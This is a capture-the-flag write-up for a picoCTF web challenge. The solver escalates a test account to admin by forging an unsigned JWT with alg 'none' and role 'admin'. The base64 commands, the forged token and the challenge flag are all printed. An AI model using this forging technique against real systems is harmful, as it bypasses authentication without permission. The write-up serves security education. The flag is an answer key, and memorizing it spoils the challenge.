[Web] JAuth (300 pts)
Question
Most web application developers use third-party components without testing their security. Some of the past affected companies are:
Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one? The website is running
The website is running here. Can you become an admin?
You can login as test with the password Test123! to get started.
Hint
Use the web browser tools to check out the JWT cookie.
The JWT should always have two (2) . separators.
Solution
The challenge gave us a login page. After login in, nothing interesting on the page, then I checked the login request to see what was going on. After login, Iβve got a user token, letβs go to jwt and decode it. The notable field here is the role, I got the role of user, so what if we change it to admin?
Iβve tried to change the role to admin and tried again with a new token, but I failed.
Hmm, wait, I could see that the token uses HS256 algorithms, and maybe it could lead to jwt none algorithm vulnerability. I generated my new own token and change 2 values alg=none and role=admin
# Generate new header
echo -n '{"typ":"JWT","alg":"none"}' | base64
=> eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
# Generate new payload
echo -n '{"auth":1674810645022,"agent":"test123","role":"admin","iat":1573358396}' | base64
=> eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9
# Merged JWT
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9.
After got a new token, I sent the request with the new token, luckily, this time I was right, then I got the flag
Flag
picoCTF{succ3ss_@u7h3nt1c@710n_bc6d9041}Last updated